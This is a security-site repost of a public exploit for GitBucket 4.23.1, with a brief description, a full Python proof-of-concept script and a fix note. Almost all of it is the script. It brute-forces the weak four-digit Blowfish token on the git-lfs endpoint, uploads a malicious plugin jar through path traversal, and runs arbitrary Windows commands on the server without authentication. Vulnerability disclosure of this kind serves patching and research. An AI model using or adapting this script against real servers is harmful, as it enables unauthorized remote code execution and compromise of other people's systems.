首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
GitBucket 4.23.1 - Remote Code Execution
来源:https://security.szurek.pl/ 作者:Szurek 发布时间:2018-05-22  
# Exploit Title: GitBucket 4.23.1 Unauthenticated RCE
# Date: 21-05-2018
# Software Link: https://github.com/gitbucket/gitbucket
# Exploit Author: Kacper Szurek
# Contact: https://twitter.com/KacperSzurek
# Website: https://security.szurek.pl/
# Category: remote
 
1. Description
 
Abusing weak secret token and passing insecure parameter to File function.
 
2. Proof of Concept
 
import os
try:
    from Crypto.Cipher import Blowfish
except:
    print "pip install pycrypto"
    os._exit(0)
 
import binascii
import base64
import urllib2
import urllib
import time
import sys
import pickle
 
print "GitBucket 4.23.1 Unauthenticated RCE"
print "by Kacper Szurek"
print "https://security.szurek.pl/"
 
print "Working only when server is installed on Windows"
 
def PKCS5Padding(string):
    byteNum = len(string)
    packingLength = 8 - byteNum % 8
    appendage = chr(packingLength) * packingLength
    return string + appendage
 
def encrypt(content, key):
    content = PKCS5Padding(content)
    cipher = Blowfish.new(key, Blowfish.MODE_ECB)
    return base64.b64encode(cipher.encrypt(content))
 
def get_file(git_bucket_url, file, key, expiration_time):
    payload = "{} {}".format(expiration_time, file)
    authorization = encrypt(payload, key)
    url = "{}/git-lfs/aa/bb/{}".format(git_bucket_url, file)
 
    try:
        request = urllib2.Request(url)
        request.add_header("Authorization", authorization)  
        result = urllib2.urlopen(request).read()
        return result
 
    except Exception, e:
        # If payload is correct and file does not exist, we got error 400
        if not "Error 500" in e.read():
            return 'OK'
 
def put_file(git_bucket_url, file, key, expiration_time, content):
    payload = "{} {}".format(expiration_time, file)
    authorization = encrypt(payload, key)
    url = "{}/git-lfs/aa/bb/{}".format(git_bucket_url, file)
 
    try:
        request = urllib2.Request(url, data=content)
        request.add_header("Authorization", authorization)
        request.get_method = lambda: 'PUT'
        result = urllib2.urlopen(request)
        return result.getcode() == 200
        
    except Exception, e:
        return None
 
def send_command(git_bucket_url, command):
    try:
        result = urllib2.urlopen("{}/exploit?{}".format(git_bucket_url, urllib.urlencode({'command' : command}))).read()
        return result
    except:
        return None
 
def pickle_key(url, key):
    output = open(pickle_path, "wb")
    pickle.dump({'url' : url, 'key' : key}, output)
    output.close()
    print "[+] Key pickled for futher use"
 
 
def unpickle_key(url):
    if os.path.isfile(pickle_path):
        pickled_file = open(pickle_path, "rb")
        data = pickle.load(pickled_file)
        pickled_file.close()
        if data['url'] == url:
            return data['key']
    return None
 
if len(sys.argv) != 3:
    print "[-] Usage: exploit.py url command"
    os._exit(0)
 
 
exploit_jar = 'exploit.jar'
url = sys.argv[1]
command = sys.argv[2]
pickle_path = 'gitbucket.pickle'
 
if url.endswith('/'):
    url = url[0:-1]
 
try:
    is_gitbucket = urllib2.urlopen("{}/api/v3/".format(url), timeout=5).read()
except:
    is_gitbucket = ""
 
if not is_gitbucket.startswith('{"rate_limit_url"'):
    print "[-] Probably not gitbucket url: {}".format(url)
    os._exit(0)
 
if not os.path.isfile(exploit_jar):
    print "[-] Missing exploit file: {}".format(exploit_jar)
    os._exit(0)
 
expiration_time = int(round(time.time() * 1000))+(1000*6000)
print "[+] Set expire time to: {}".format(expiration_time)
 
print "[+] Start search blowfish key: "
for i in range(0, 10000):
    if i % 100 == 0:
        print "+",
 
    potential_key = unpickle_key(url)
    if potential_key:
        print "\n[+] Unpickle key, try it"
    else:
        potential_key = str(i).zfill(4)
 
    config_path = "non_existing_file"
    config_content = get_file(url, config_path, potential_key, expiration_time)
    if config_content:
        print "\n[+] Found blowfish key: {}".format(potential_key)
        print "[+] Config content:\n{}".format(config_content)
 
        exploit_path = "..\..\..\..\plugins\exploit.jar"
        f = open(exploit_jar, "rb")
        exploit_content = f.read()
        f.close()
        if put_file(url, exploit_path, potential_key, expiration_time, exploit_content):
            print "[+] Wait few second for plugin load"
            time.sleep(5)
            command_content = send_command(url, "cmd /c {}".format(command))
 
            if command_content:           
                    pickle_key(url, potential_key)
                    print command_content
            else:
                print "[-] Cannot execute command"
            
        else:
            print "[-] Cannot upload exploit.jar"
        
        os._exit(0)
 
3. Solution:
  
Update to version 4.24.1
  
https://github.com/gitbucket/gitbucket/releases/download/4.24.1/gitbucket.war
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Easy MPEG to DVD Burner 1.7.11
·Linux 2.6.30 < 2.6.36-rc8 - Re
·Microsoft Edge Chakra JIT - Bo
·R 3.4.4 - Local Buffer Overflo
·DynoRoot DHCP - Client Command
·Adobe Experience Manager (AEM)
·Prime95 29.4b8 - Stack Buffer
·Siemens SIMATIC S7-1500 CPU -
·HPE iMC 7.3 - Remote Code Exec
·Microsoft Edge Chakra JIT - Ma
·AF_PACKET packet_set_ring Priv
·AMD / ARM / Intel - Speculativ
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved